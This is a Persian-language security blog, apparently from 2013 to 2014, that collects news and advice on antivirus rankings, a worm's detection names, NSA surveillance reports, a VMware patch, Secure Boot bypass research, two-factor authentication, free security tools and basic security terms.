گزارش Gartner: برای ششمین سال، McAfee شرکت پیشگام


موسسه گارتنرموسسه Gartner، یکی از معتبرترین موسسات بین المللی ارزیابی کننده محصولات IT، برای ششمین سال متوالی شرکت McAfee را به عنوان یک شرکت پیشگام (Leader) در زمینه محصولات “حفاظت از دستگاه های کاربران نهایی تحت بسترهای مختلف” یا Endpoint Protection Platforms یا به اختصار EPP معرفی کرد.

براساس گزارش موسسه Gartner که ۱۸ دی ماه منتشر شد، شرکت McAfee قادر بوده تا با درک صحیحی از شرایط محیط کار و نیاز کاربران، امکانات زیر را در محصولات خود فراهم کند.

- قابلیت های مدیریتی و گزارش دهی جامع
- حفاظت از سیستم های عامل و نرم افزارهای مختلف
- کنترل برنامه ها و حفاظت بهینه از بسترهای مجازی

شرکت McAfee که اکنون به عنوان جزیی از شرکت Intel فعالیت می کند، جایگاه دوم را در بازار EPP جهان دارد.

منظور از EPP، راهکارهایی است که قادر به حفظ امنیت جامع کامپیوترها، تلفن های هوشمند و کامپیوترهای خشتی (Tablet) باشند. فعالان این بازار، درخصوص قابلیتهای امنیتی، کیفیت امکانات و راحتی مدیریت، با یکدیگر رقابت می کنند.

ادامه نوشته

برتری Bitdefender در جدیدترین آزمون AV-Test



آزمون av-testطبق نتایج آزمون صورت گرفته توسط موسسه AV-Test.org در ماه های نوامبر و دسامبر ۲۰۱۳، محصولات Bitdefender به همراه Trend Micro و Kaspersky توانسته اند در صدر جدول برترین راهکارهای ضدبدافزار قرار بگیرند. در این گزارش عملکرد ضدبدافزارها در دو بخش سازمانی و خانگی بر روی سیستم های عامل Windows 8 و Windows 8.1 بررسی شده است.

در آزمونهای AV-Test محصولات ضدبدافزار در سه بخش حافظت (Protection)، کارایی (Performance) و قابلیت استفاده (Usability) مورد ارزیابی قرار می گیرند. هر یک از این بخشها امتیازی بین ۰ تا ۶ دارند.

در امتیازدهی بخش “حفاظت”، ضدبدافزار بر روی سیستمی غیرآلوده نصب و نحوه واکنش آن به بدافزارها و روشهای مختلف انتشار آنها همچون پیوست ایمیل ها، تارنما و حافظه های جانبی بررسی می شود. در بخش “کارایی” میزان تاثیر ضدویروس بر روی سرعت سیستم در زمانهای مختلفی همچون در هنگام نصب برنامه ها و یا اجرای برنامه هایی نظیر Word یا Excel محاسبه می شود. در بخش “قابلیت استفاده” نیز کیفیت و درستی هشدارها و پیام های ضدبدافزار بررسی می شود. 

همانطور که در جدول زیر نمایش داده شده است، Bitdefender، در جمع راهکارهای سازمانی، با شناسایی تقریباً تمامی بدافزارها در کنار Trend Micro بالاترین امتیاز را به خود اختصاص داده است.

محصولات ضدبدافزار حفاظت کارایی قابلیت استفاده مجموع
Bitdefender Endpoint Security 5.1 & 5.3 5.5 6 6 17.5
Fortinet FortiClient 5.0 4.5 2 6 12.5
F-Secure Client Security 11.00 6
4.5 5.5 16
Kaspersky Lab Endpoint Security 10.1 6 5 6 17
McAfee VirusScan Enterprise with ePO 8.8 5 3 5.5 13.5
Sophos Endpoint Security and Control 10.3 4 3 6 13
Symantec Endpoint Protection 12.1 5.5 3.5 6 15
Trend Micro Office Scan 10.6 6 5.5 6 17.5

همچنین جدول زیر، امتیازات کسب شده توسط ضدبدافزارها را در بخش خانگی نمایش می دهد.

ادامه نوشته

بدافزار RDN/Spybot.bfr


نام بدافزار     RDN/Spybot.bfr نوع بدافزار     Worm
تاریخ انتشار     2014/01/26 درجه اهمیت     کم

ویروسچيست؟

بدافزاری با درجه خطر کم (Low) و از نوع ”کرم” (Worm) که به طور خودکار خودش را منتشر می کند. در سال جاری (۱۳۹۲) گونه های متعددی از این بدافزار منتشر شده و آخرین گونه در دی ماه سال جاری (۱۳۹۲) مشاهده شده است. در حال حاضر میزان آلودگی به این بدافزار در خاورمیانه پایین تر از سایر نقاط جهان می باشد.

نامگذاری ها

اين بدافزار با نام های زير توسط ضدويروس های مختلف شناسايی می شود:

McAfee: RDN/Spybot.bfr
Ahnlab: Trojan/Win32.ArchSMS
Avast: Win32:Dropper-gen
AVG (GriSoft): Generic35.BGMS (Trojan horse)
Avira: TR/Zusy.74510.2
Kaspersky: Trojan.Win32.Inject.hfmu
BitDefender: Gen:Variant.Zusy.74510
Clamav: PUA.Win32.Packer.UpxProtector
Dr.Web: Trojan.InstallMonster.47
FortiNet: W32/Inject.BB!tr
Eset: Win32/InstallMonstr.BB application
Norman: win32:win32/Inject.BJMY
Panda: Trj/Genetic.gen
Sophos: Mal/Behav-043

ادامه نوشته

سوء استفاده نفوذگران از گزارش های Windows Crash Report

گزارش هایی که در زمان از کار افتادن کامپیوتر و یا بروز خطا توسط سیستم عامل Windows تهیه شده و تحت نام Crash Reports برای شرکت مایکروسافت ارسال می شوند، حاوی اطلاعات زیاد و بسیار مفیدی برای نفوذگران و سازمان های امنیتی هستند تا بتوانند کاربر مورد نظرشان را شناسایی کرده و از وضعیت سیستم او مطلع شوند. تمام این اطلاعات نیز بدون رمزگذاری بین کامپیوتر کاربر و سرورهای مایکروسافت رد و بدل می شود.

در جدیدترین شماره مجله معتبر آلمانی “اشپیگل” (Der Spiegel) اسنادی که به نظر می رسد از سوی Edward Snowden، پیمانکار سابق سازمان امنیت ملی (NSA) و افشاگر مشهور آمریکایی ارائه شده، به چاپ رسیده است که نشان می دهد سازمان امنیت ملی آمریکا (NSA) حجم عظیمی از گزارش های Windows Crash Report را در سطح جهان جمع آوری کرده و با بررسی آنها، قادر است کامپیوترهای مورد نظر خود را شناسایی و ردیابی کند. همچنین با تجزیه و تحلیل این گزارشها می تواند نرم افزارهای نصب شده، نگارش سیستم عامل و اصلاحیه های اعمال شده بر روی کامپیوتر نحت نظر را تشخیص دهد.


ادامه نوشته

پرداخت مخفیانه سازمان امنیت ملی به شرکت امنیتی RSA

سازمان امنیت ملی آمریکا (NSA) در یک توافقنامه محرمانه، ۱۰ میلیون دلار به شرکت RSA، برای دستکاری الگوریتم رمزنگاری خود که بصورت گسترده در برنامه های امنیتی مورد استفاده قرار می گیرد، پرداخت کرده است. این گزارشی بود که خبرگزاری رویترز هفته گذشته آنرا منتشر نمود. گزارشی که سازمان امنیت ملی را متهم به ضعیف تر کردن استانداردهای رمزنگاری به منظور رصد کامل داده ها می کند..

ادامه نوشته

اصلاح ضعف امنیتی در VMware ESX, ESXi

شرکت VMware یک نقطه ضعف امنیتی را در محصولات ESX و ESXi خود برطرف کرد. سوء استفاده از این نقطه ضعف می توانست دسترسی غیرمجاز محلی به فایلها را فراهم آورد.

طبق هشدار امنیتی شرکت VMware، سوء استفاده از این نقطه ضعف امنیتی می تواند به یک کاربر vCentre Server مجوز Add Existing Disk بدهد تا قادر به خواندن و نوشتن فایلهای روی ESX و ESXi باشد. سوء استفاده از این ضعف امنیتی فقط بصورت محلی (Local) و از طریق vCentre امکان پذیر است. vCentre ابزار مدیریتی محصولات مجازی سازی VMware است.

کسب مجوز دسترسی بالاتر توسط یک کاربر عادی بر روی نسخه های آسیب پذیر ESX نه تنها امکان خواندن فایلهای موجود و افزودن فایلهای جدید را می دهد، بلکه به این کاربر مجوز تغییر محتوای فایلهای را نیز می دهد. تحت این شرایط، کاربر غیرمجاز می تواند بدافزارهایی را در این فایلهای سالم گنجانده و مخفی سازد تا پس از راه اندازی مجدد ماشین به اجرا درآیند.

کاربران عادی vCentre Server که گزینه های Virtual machine Power User یا Resource Pool Admin برای آنها فعال شده باشد، مجوز Add Existing Disk را خواهند داشت.

مسئولان VMware توصیه می کنند که تا زمان نصب  اصلاحیه لازم، تعداد کاربران vCentre که گزینه های فوق برای آنها تعریف شده است، محدود گردد. همچنین در هنگام نصب و راه اندازی vCentre Server این گزینه های مهم بطور پیش فرض برای کاربران عادی فعال نگردند.

نسخه های ۴٫۰ و ۴٫۱ برای ESX و نسخه های ۴٫۰، ۴٫۱، ۵٫۰، ۵٫۱ و ۵٫۵ برای ESXi دارای این نقطه ضعف امنیتی هستند.

شرکت VMware هشدار داده است که اصلاحیه منتشر شده برای ترمیم این نقطه ضعف در ESX و یا ESXi که تغییراتی در فایل Configrules آنها داده شده است، تاثیری نخواهد داشت. البته به ندرت فایل Configrules تغییر داده می شود ولی در صورت تغییر، VMware راه حل جداگانه ای برای این موارد بر روی سایت خود ارائه کرده است.

امنیت مرورگر  ( Web Browser )

برای امنیت بیشتر سعی کنید که از مرورگر های متفاوت برای منظور های مختلف استفاده کنید و به استفاده از مرورگر پیش فرض سیستم اکتفا نکنید. در اکثر وبسایت های امنیتی امروزه، مرورگر Chrome به عنوان امن ترین نرم افزار مرورگر وب و پس از آن مرورگر  Firefox به کاربران توصیه می شود. توصیه ما نیز به شما استفاده از یکی از این دو نرم افزار برای مرور صفحات وب است و علی الخصوص در صورتی که دارای حساب کاربری gMail هستید، برای دسترسی به حساب کاربری خود از مرورگر Chrome استفاده کنید.

مرورگر Firefox نیز دارای بسته های نرم افزاری افزودنی متعددی می باشد که بعضی از آنها می توانند در راستای استفاده ساده تر و ایمن تراز اینترنت به شما کمک کنند. در نهایت، این بدان معنی نیست که اگر شما از مرورگری مانند Internet Expolorer استفاده می کنید، لزوما در معرض خطرات امنیتی قرار می گیرید، به ویژه اگر از نسخه های آخر این مرورگر ( از نسخه 8 به بعد ) استفاده می کنید ولی استفاده از این مرورگر، ریسک استفاده شما از اینترنت را افزایش می دهد و به نسبت دارای امکانات کمتری برای پردازش صفحات وب است.

ادامه نوشته

امنيت چيست ؟

اولين رسالت امنيت ، حفاظت از سرمايه های يك سازمان است كه ممكن است شامل آيتم های ملموسی نظير يك صفحه وب و يا بانك اطلاعاتی مشتريان و يا آيتم های غيرملموسی نظير شهرت و اعتبار يك سازمان باشد. امنيت يك مسير است نه يك مقصد و به موازات تجزيه و تحليل زيرساخت و برنامه های موجود ، می بايست اقدام به شناسائی تهديدات و خطرات ناشی از آنان نمود . در واقع ، امنيت به مديريت خطرات و پياده سازی يك سيستم به منظور پاسخگوئی و مقابله با تهديدات اشاره داشته و در ارتباط با عتاصر كليدی زير است :

  • Authentication ،  فرآيندی است كه به كمك آن به صورت منحصربفرد سرويس گيرندگان يك برنامه شناسائی می گردند . كاربران ،  سرويس ها ، فرآيندها و كامپيوترها ،  نمونه هائی از سرويس گيرندگان يك برنامه می باشند . در واقع ، authentication هويت استفاده كنندگان يك برنامه را بررسی می نمايد .

  • Authorization ، فرآيندی است كه به كمك آن دستيابی سرويس گيرندگان تائيد شده به منابع و عملياتی كه قصد انجام آن را دارند بررسی و مجوز لازم صادر می گردد. فايل ها ، بانك های اطلاعاتی ، جداول ، سطرها ، منابع موجود در سطح سيستم نظير كليدهای ريجتسری و داده پيكربندی ، نمونه هائی از منابع مورد درخواست سرويس گيرندگان می باشند . انجام تراكنش هائی خاص نظير خريد يك محصول ، واريز و انتقال پول از يك حساب به حساب ديگر و يا افزايش اعتبار يك كارت اعتباری از جمله عملياتی می باشند كه می بايست مجوز استفاده از آنان برای سرويس گيرندگان صادر گردد . در واقع ، authorization محدوده مجاز عملياتی را كه يك سرويس گيرنده می تواند انجام دهد را مشخص می نمايد .

  • Auditing :  مميزی موثر و ثبت عمليات انجام شده يكی از اصول مهم در جلوگيری از انجام اعمال خلاف قانون است . بدين ترتيب اين اطمينان ايجاد خواهد شد كه يك كاربر نمی تواند باعث عدم انحام يك كار و يا فعاليت در سيستم گردد و يا يك تراكنش را مقداردهی اوليه نمايد . مثلا" در يك سيستم e-commerce  می بايست از مكانيزم هائی استفاده گردد تا اين اطمينان حاصل گردد كه يك مصرف كننده نمی تواند سفارش انجام شده برای خريد يكصد نسخه از يك كتاب را انكار نمايد .

  • Confidentiality ، كه از آن با نام privacy نيز نام برده می شود ، فرآيندی است كه به كمك آن اين اطمينان ايجاد می گردد كه حريم خصوصی داده رعايت و امكان مشاهده آن توسط كاربران غيرمجاز و يا ساير افرادی كه  قادر به رديابی ترافيك يك شبكه می باشند ، وجود نخواهد داشت . 

  •  Integrity ، فرآيندی است كه به كمك آن اين اطمينان ايجاد می گردد كه داده در مقابل تغييرات تصادفی و يا تعمدی حفاظت خواهد شد . همانند privacy ، يكپارچگی اطلاعات يك فاكتور اساسی در خصوص امنيت داده محسوب می گردد ، خصوصا" در مواردی كه داده در طول شبكه مبادله خواهد شد . يكپارچگی داده در حال حمل ،‌عموما" با استفاده از روش هائی نظير hashing و يا كدهای تائيد پيام انجام می شود .

  • Availability ، فرآيندی است كه به كمك آن اين اطمينان ايجاد خواهد شد كه همواره داده برای كاربران مجاز در دسترس و قابل استفاده خواهد بود . در اغلب حملات از نوع DoS ، مهاجمان اين هدف را دنبال می نمايند كه بتوانند امكان استفاده و در دسترس بودن برنامه برای كاربران مجاز را غيرممكن و عملا" آن را از كار بيندازند .

تعاريف اوليه برخی از  اصطلاحات امنيتی : تهديدات ، نقاط آسيب پذير و حملات

  • تهديد ( threat ) : به هرگونه پتانسيل بروز يك رويداد مخرب و يا ساير موارد ديگر كه می تواند به سرمايه های يك سازمان آسيب برساند ، تهديد  گفته می شود . به عبارت ديگر، هر رويدادی كه بتواند به سرمايه های يك سازمان آسيب برساند ، در زمره تهديدات محسوب می گردد . 

  • نقاط آسيب پذير (vulnerability) : ضعف های موجود در يك سيستم می باشند كه پتانسيل اوليه بروز يك رويداد مخرب را فراهم می نمايند . ضعف در طراحی ، پيكربندی اشتباه ، استفاده از روش های كدينگ غيرايمن مهمترين دلايل ايجاد يك ضعف در سيستم می باشند . ضعف در بررسی صحت داده ورودی توسط كاربر ، نمونه ای از يك لايه آسيب پذير در يك برنامه است كه می تواند زمينه بروز يك تهاجم را فراهم نمايد .

  • تهاجم (attack) : عملياتی است كه محوريت آن سوء استفاده از نقاط آسيب پذير و پتانسيل های بروز يك رويداد مخرب می باشد .  ارسال ورودی مخرب به يك برنامه و يا flooding يك شبكه به منظور از كار انداختن يك سرويس ، نمونه هائی در اين زمينه می باشد .

IBM با استفاده از NFC تأیید دو مرحله ای را به دستگاه های موبایل می آورد

هر روز خدمات بیشتری در اینترنت به استفاده از «تأیید دو مرحله ای» روی می آورند و تقریباً دیگر سرویس مهمی را پیدا نمی کنید که از این قابلیت برای افزایش امنیت کاربرانش استفاده نکند.

اما روش های موجود، اغلب به هدف رایانه های شخصی طراحی شده اند و جامعه رو به فزونی دستگاه های همراه مثل تلفن ها و تبلت ها از آنها بی بهره اند. استفاده از خدمات حساسی مانند تراکنش های مالی یا حتی شبکه های اجتماعی و ایمیل ها هر روز در حال افزایش است و ایجاد روشی قابل اتکا برای برقراری تأیید دو مرحله ای در آنها ضرورت دارد.

شرکت پیشروی IBM با درک این نیاز، موفق به ارائه شیوه جدید برای تأیید دو مرحله ای با استفاده از NFC شده که مسلماً قابل بسط به دستگاه های همراه خواهد بود.

در توضیحات یکی از محققان امنیتی این شرکت آمده: «بانک ها و وب سایت های بزرگ از ترکیب رمز عبور و تلفن کاربران، تأیید دو مرحله ای برای ورود به خدمات خود توسط رایانه شخصی را ممکن می کنند، اما وقتی بخواهید با یک تلفن به از آن استفاده کنید چه پیش می آید؟

اتصال بی سیم NFC همین حالا هم برای انتقال اطلاعات و یا پرداخت های مالی به کار می رود؛ فقط کافی است دو تلفن به هم یا پایانه فروش نزدیک شوند. می توان به کاربردهای این سیستم افزود و تأیید دو مرحله ای را به دنیای موبایل آورد.»

روش تأیید دو مرحله ای IBM برای دستگاه های موبایل ترکیبی است از یک رمز عبور که کاربر تعیین می کند و یک کارت مجهز به تراشه NFC تا امنیت ورود افزایش یابد.

«وقتی از تلفن تان برای دسترسی به یک سرویس استفاده می کنید طبیعتاً خود تلفن نمی تواند مرحله دوم تأیید باشد. برای این منظور می توان از یک کارت اعتباری مجهز به NFC استفاده کرد که توسط بانک یا دیگر سرویس دهنده ها به عنوان مرحله دومِ تأیید هویت به کار گرفته شود.»

تأیید دو مرحله ای از آن جا که رمز عبور را به تنهایی از کفایت برای ورود به یک سرویس خارج می کند باعث افزایش امنیت می شود. مرحله دوم باید عاملی باشد که توسط صاحب اصلی حساب استفاده شود؛ مثلاً گوگل برای مرحله دوم خود چند شکل انتخابی در نظر گرفته: ارسال پیامک به شماره تلفن همراه، برقراری تماس با وی و یا دریافت رمز یک بار مصرف از اپلیکیشنی که به این کار اختصاص دارد. بانک ها هم مشابه روش آخر دستگاه هایی را برای تولید چنین رمزهایی در اختیاز مشتریان خود قرار می دهند.

حالا با استفاده از روش جدید IBM عملیات به این صورت انجام می گیرد که برای مثال ابتدا اپلیکیشن بانک خود را اجرا می کنید تا اعداد خاصی را به تلفن تان بفرستد. سپس، اپلیکیشن از شما رمز عبور را درخواست می کند. اما این بار بعد از این که رمز را وارد کردید باید کارت NFC که بانک به شما داده را به تلفن نزدیک کنید.

در قدم بعد، تلفن همان اعداد خاصی که تولید شده بود را از طریق NFC به کارت ارسال می کند؛ کارت آن را بر اساس الگوی اختصاصی خود محاسبه می کند و حاصل به تلفن بر می گرداند تا تلفن، نتایج را [از طریق اینترنت یا پیامک] به بانک بفرستد. اگر رمز عبور غلط باشد یا از کارت اشتباهی استفاده شده باشد تأیید انجام نمی گیرد.

این روش جدید همزمان که امنیت را بالا می برد آن قدرها هم دشوار نیست که مصرف کننده از استفاده از آن روی گردان شود. محقق IBM در این باره معتقد است: «اگر یک روش درست کنیم که برای تأیید شدن نیاز به عبور از ۲۰،۰۰۰ مرحله باشد خیلی امن می شود ولی کسی حاضر نخواهد شد از آن استفاده کند.»

البته نباید انتظار داشت که این فناوری خیلی زود اجرایی شود، هر چند بسیاری از تلفن های اندرویدی از NFC برخوردارند اما کماکان اپل از گنجاندنش در iDeviceها خودداری می کند و این یعنی دست یافته IBM برای بخش مهمی از مصرف کنندگان بی مصرف خواهد بود. نظر شما درباره این فناوری جدید چیست؟ در ضمن فعال کردن تأیید دو مرحله ای برای حساب ایمیل و شبکه های اجتماعی فراموش نشود.

چرا باید بیشتر از یک آنتی ویروس داشته باشیم؟

اگر کاربر سیستم‌عامل ویندوز هستید باید از نرم افزار آنتی ویروس استفاده کنید. اما نوع این نرم افزار بسیار اهمیت دارد و گاهی فقط یک نرم افزار پاسخ‌گوی نیاز کاربر نیست. یکی از کارشناسان امنیتی به نام براندون گِرِگ اعتقاد دارد برای داشتن امنیت بهتر باید ترکیبی از ابزار امنیتی مایکروسافت و یک نرم افزار منبع باز یا رایگان امنیتی را روی سیستم خود نصب کنید. دلیل آن را نیز در ادامه برایتان ذکر کرده ایم.

با اینکه بیشتر کاربران از دو آنتی ویروس به طور همزمان استفاده نمی کنند اما باید بدانید داشتن دو آنتی ویروس روی کامپیوتر بسیار مفید است. ( هشدار: باید به این نکته مهم توجه کنید که اکثر آنتی ویروس ها امکان کارکرد همزمان را روی سیستم عامل ندارند و در صورتی که ندانسته چنین کاری را انجام دهید می تواند سبب از کار افتادن سیستم عامل یا کندی کامپیوتر شود در این مطلب منظور ما این نیست که هر دو آنتی ویروس را با هم استفاده کنید. لطفا مطلب را با دقت مطالعه کنید.)

بیشتر نرم افزارهای ضد ویروس همچون مک‌آفی، نورتون یا... سعی می کنند تا ویروس های احتمالی را در وب یا مکان های دیگر شناسایی کنند، سپس آپ دیتی با شناسایی ویروس برای شما می فرستند و به این ترتیب کامپیوتر شما می تواند خطرات احتمالی را شناسایی کند. این بسیار خوب به نظر می رسد اما برندون دو مشکل اصلی (از میان مشکلات زیاد) این روشِ دسترسی به نرم افزار آنتی ویروس را شناسایی کرده است:

مشکل اول: هکرهای بسیار حرفه ای یا سازمان های جاسوسی (مانند سازمان جاسوسی آمریکا) بدافزارهایی تولید می کنند که قبلا هرگز در اینترنت دیده نشده است و آن را برای یک گروه از مخاطبین خاص می فرستد. شما فکر می کنید که انتی ویروس شما قادر به شناسایی چنین بدافزاری است؟ پاسخ منفی است.

مشکل دوم: من می توانم تایید کنم که شرکت مک‌آفی (یا هر کمپانی ضد ویروس دیگری) یک لیست سفید دارند. این لیست سفید به برخی ابزارهای جاسوسی برای نیروهای پلیس یا دیگر آژانس های جاسوسی (شامل شرکت های خصوصی) اجازه کارکرد می دهد و در مورد وجود آنها روی کامپیوتر شما هشدار نخواهد داد! بنابراین، شما می توانید کی‌لاگر، ابزار دسترسی از راه دور یا بدافزارهای دیگر روی دستگاه خود داشته باشید که آنتی ویروس تان به آنها اجازه ورود داده است.

برندون توصیه می کند از Microsoft Security Essentials به عنوان ابزار امنیتی اصلی کامپیوتر استفاده کنید و در کنار آن نیز از آنتی ویروس های رایگان یا منبع باز به صورت یک بار در هفته برای اسکن کلی کامیپوتر استفاده نمایید. ابزارهایی مانند malwarebytes . باید بدانید ابزار امنیتی مایکروسافت بسیار عالی است اما باید در کنار آن آنتی ویروس دومی نیز داشته باشید تا مطمئن شوید که مایکروسافت کار خود را به درستی انجام می دهد.

دوباره باید یادآوری کنیم، مساله مهم این است هرگز هر دو برنامه را به طور همزمان اجرا نکنید. آنتی ویروس ها اصولا خیلی خوب با هم کنار نمی آیند و استفاده همزمان از دو نرم افزار شاید به این منجر شود که یکی به عنوان ویروس شناخته شود. یا در برخی موارد، حتی باعث اختلال در عملکرد فایل شود. بعلاوه، اجرای همزمان دو برنامه باعث تحلیل رفتن منابع سیستم نیز می شود. در عوض، همیشه از یک ابزار امنیتی به صورت همیشه روشن استفاده کنید و نرم افزار آنتی ویروس دوم خود را در مواقع لازم به صورت دستی فعال کنید. که باید در این هنگام ابزار امنیتی اولی را غیر فعال کنید.

می توانید این کار را یک بار در هفته انجام دهید. با این روند می توانید امنیت سیستم را افزایش بدهید بدون اینکه برای کامپیوتر خود مشکلی ایجاد کرده باشید.

۶ ابزار رایگان برای امنیت بهتر اینترنتی

۶ ابزار رایگان برای امنیت بهتر اینترنتی
۱.  HTTPS Everywhere . همان طور که می دانید وبگردی در محیط دارای ssl بسیار امنتر از وبگردی در میان صفحات معمولی است. این افزونه که برای کروم و فایرفاکس در دسترس است، اطمینان حاصل می کند که ارتباطات شما با بسیاری سایت های مهم، به صورت ssl باشد، در نتیجه احتمال کمتری برای حملات موقع دانلود یا ایجاد حساب های کاربری وجود دارد.

۲. LastPass . این حتما برای شما افزونه ای آشنا است. با استفاده از آن نه تنها رمزهای عبور شما به صورت امن ذخیره می شوند، بلکه می توانید رمزهای طولانی و امن نیز درست کنید. رمزهای شما بر روی پایگاه داده ابری ذخیره، و به صورت خودکار در سایت های مورد بازدید وارد می شوند.

۳. LongURL . اگر از توییتر استفاده می کنید، حتما لینک های کوتاه شده را دیده اید. هر چند این لینک های کوتاه برای خلوت کردن منظره وبگردی شما خوب هستند ولی گاه می توانند شما را به مقاصد گردشگری ناامنی در این قلمروی وسیع هدایت کنند. بنابراین با این افزونه می توانید آنها را به شکل بلند خودشان برگردانید تا مقصد را از روی آدرس٬ تشخیص دهید.

۴. NoScript . این افزونه مناسب برای فایرفاکس جلوی اجرا شدن پلاگین های جاوا اسکریپت و فلشی که روی سایت ها هستند را می گیرد. اگر هم به سایتی اطمینان دارید٬ می توانید آن را داخل فهرست سفید قرار دهید ولی برای سایت های ناشناس یک چنین محافظی چاره ساز است.

۵. Trusteer Rapport . این یک ابزار خوب مقابله با بد افزار و نیز یک رمزنگار است که برنده جایزه نیز شده. با استفاده از آن می توانید هر بدافزاری را که قصد سرقت اطلاعات شما را دارد مسدود کنید و نیز جلوی ورود اطلاعات حساس تان به سایت های جعلی (مثلا در مواردی نظیر جعل سایت بانک ها) را می گیرد.

۶.  VirusTotal . می توانید هر نوع فایل یا آدرس URL را به دست این ابزار تحت وب (که زیر مجموعه گوگل است) بسپارید تا آنها برای یافتن ویروس ها٬ کرم ها٬ تروجان ها٬ و دیگر گونه های بدافزار اسکن کند.

كدی كه مكانیزم راه‌اندازی امن ویندوز 8 را دور می‌زند

ین حملات به علت اشتباهات تولید کنندگان رایانه در پیاده‌سازی UEFI ممکن می‌گردد.
به گفته یک گروه از محققان امنیتی، مکانیزم راه‌اندازی امن در ویندوز 8 در رایانه‌های برخی از تولید کنندگان می‌تواند دور زده شود، چراکه اشتباهاتی در نحوه پیاده‌سازی UEFI در این تولید کنندگان وجود دارد.
سه محقق امنیتی روز چهارشنبه در کنفرانس Black Hat در لاس وگاس، دو حمله را به نمایش گذاشتند که برای نصب یک بوت‌کیت بر روی سیستم‌های تحت تأثیر، راه‌اندازی امن را دور می‌زند.
راه‌اندازی امن یک ویژگی UEFI است که صرفاً به آن دسته از اجزای نرم‌افزار که دارای امضاهای دیجیتالی مورد اعتماد هستند اجازه می‌دهد که در طول بازه زمانی راه‌اندازی بارگذاری گردند. این ویژگی به طور خاص برای جلوگیری از سوء استفاده بدافزارهایی مانند بوت‌کیت‌ها از فرآیند راه‌اندازی طراحی شده است.
به گفته این محققان، این سوء استفاده نه به علت آسیب‌پذیری‌های راه‌‌اندازی امن، بلکه به دلیل خطاهای پیاده‌سازی توسط تولید کنندگان پلتفورم ممکن می‌گردد.
به گفته یکی از این محققین که در مک‌آفی کار می‌کند، نخستین کد سوء استفاده کننده به این علت کار می‌کند که تولید کنندگان به طور مناسب از سفت‌افزار خود محافظت نکرده و به مهاجم اجازه می‌دهند کد مسئول راه‌اندازی امن را تغییر دهند.

ادامه نوشته

تهدیدات شبکه های اجتماعی

شبکه های اجتماعی یکی از جدیدترین سرویس های اینترنتی است،که از جنبه های مختلف قابل کنکاش و ارزیابی است
این شبکه ها نسل جدیدی از پايگاه‌هايي هستند که این روزها تا حدودی در کانون توجه کاربران شبکه جهانی اینترنت قرار گرفته‌اند. این‌گونه پايگاه‌ها بر مبنای تشکیلات آنلاین فعالیت می‌کنند و هر کدام دسته‌ای از کاربران اینترنتی با ویژگی خاص را گرد هم می‌آورند. شبکه‌های اجتماعی را گونه‌ای از رسانه‌های اجتماعی می‌دانند که امکان دستیابی به شكل جدیدی از برقراری ارتباط و به اشتراک‌گذاری محتوا در اینترنت را فراهم آورده‌اند.
معاونت تشخیص و پیشگیری فتا ناجا با بیان مطالب فوق افزود: امروزه شبکه ها و سایت های اجتماعی، توجه میلیون ها کاربر را از سراسر دنیا به خود جلب کرده اند. کاربرانی که شاید اطلاع و آگاهی کمی از کارکرد این شبکه ها داشته باشند. بر اساس گزارشات رسمی سایت های بین المللی انتشار بدافزارها در شبکه های اجتماعی افزایش یافته است و این امر باعث شده تا امنیت کاربران شبکه های اجتماعی به شدت کاهش یافته و مورد سوءاستفاده های گوناگون قرار گیرند.
امروزه در پلیس فتا شاهد تشکیل شمار زیادی پرونده از کاربرانی هستیم که در شبکه های اجتماعی مورد سوءاستفاده قرار گرفته اند. در این زمینه چند تهدید یا خطر برتر موجود در شبکه های اجتماعی اعلام می گردد.
 1.كرم هاي شبكه هاي اجتماعي:
اين كرم ها كه به طور خاص براي انتشار در شبكه هاي اجتماعي (مانند فيس بوك، MySpace، توئيتر، hi5، Friendster و Bebo) طراحي شده اند، هر روزه سيستم هاي بيشتري را به گروه های مخرب(Botnet) بزرگ خود اضافه کرده و حساب هاي كاربري بيشتري را براي ارسال هرزنامه ها و درگير كردن سيستم ها سرقت مي‌کنند.
 2. سرقت هويت:
اخیراً مشاهده شده است که ایمیلی برای برخی کاربران فیس بوک ارسال می‌شود که از آن ها می‌خواهند در اتصالی (لینکی‌) که در ظاهر متعلق به فیس بوک بود، ثبت نام (لاگین) کنند. اما این لینک در حقیقت متعلق به fbaction(کاربران را ترغیب به رفتن به لینکی می کند که صفحه جعلی ورود به فیس بوک(phishing) می باشد) بود که به این وسیله اطلاعات حساب های کاربران فیس بوک را سرقت می کرد. حسابهای کاربری بسیاری از کاربران فیس بوک در این حمله مورد سوء استفاده قرار گرفت.

ادامه نوشته

متداول‌ترین پورت‌های آسيب‌پذير

امروزه شاهد حضور مقتدرانه سيستم‌عامل‌ها در تمامی عرصه‌های پردازش اطلاعات می‌باشيم. سيستم عامل، يکی از عناصر چهار گانه در يک سيستم کامپيوتری است که دارای نقشی حياتی و تعيين کننده در رابطه با نحوه مديريت منابع سخت‌افزاری و نرم‌افزاری است. پرداختن به مقوله  امنيت سيستم‌ عامل‌ها، همواره از بحث‌های مهم در رابطه با ايمن‌سازی اطلاعات در يک سيستم کامپيوتری بوده که امروزه با گسترش اينترنت، اهميت آن مضاعف شده اس. بررسی و آناليز امنيت در سيستم عامل‌ها می‌بايست با ظرافت و در چارچوبی کاملا" علمی و با در نظر گرفتن تمامی واقعيت‌های موجود، انجام تا از يک طرف تصميم‌گيرندگان مسائل استراتژيک در يک سازمان قادر به انتخاب منطقی يک سيستم عامل باشند و از طرف ديگر امکان نگهداری و پشتيبانی آن با در نظر گرفتن مجموعه تهديدات موجود و آتی، بسرعت و بسادگی ميسر گردد .
اکثر کرم‌ها و ساير حملات موفقيت‌آميز در اينترنت، بدليل وجود نقاط آسيب‌پذير در تعدادی اندک از سرويس‌های سيستم عامل‌ها متداول است. مهاجمان، با فرصت طلبی خاص خود از روش‌های متعددی بمنظور سوء‌استفاده از نقاط ضعف امنيتی شناخته شده، استفاده نموده  و در اين راستا ابزارهای متنوع، موثر و گسترده‌ای را به منظور نيل به اهداف خود، بخدمت می‌گيرند. مهاجمان، در اين رهگذر متمرکز بر سازمان‌ها و موسساتی می‌گردند که هنوز مسائل موجود امنيتی (حفره‌ها و نقاط آسيب‌پذير) خود را برطرف نکرده و بدون هيچگونه تبعيضی آنان را به عنوان هدف، انتخاب می‌نمايند. مهاجمان بسادگی و بصورت مخرب، کرم‌هائی نظير: بلستر ، اسلامر و Code Red را در شبکه منتشر می‌نمايند. آگاهی از مهمترين نقاط آسيب‌پذير در سيستم عامل‌ها، امری ضروری است. با شناسائی و آناليز اينگونه نقاط آسيب‌پذير توسط کارشناسان امنيت اطلاعات، سازمان‌ها و موسسات قادر به استفاده از مستندات علمی تدوين شده بمنظور برخورد منطقی با مشکلات موجود و ايجاد يک لايه حفاظتی مناسب می‌باشند.

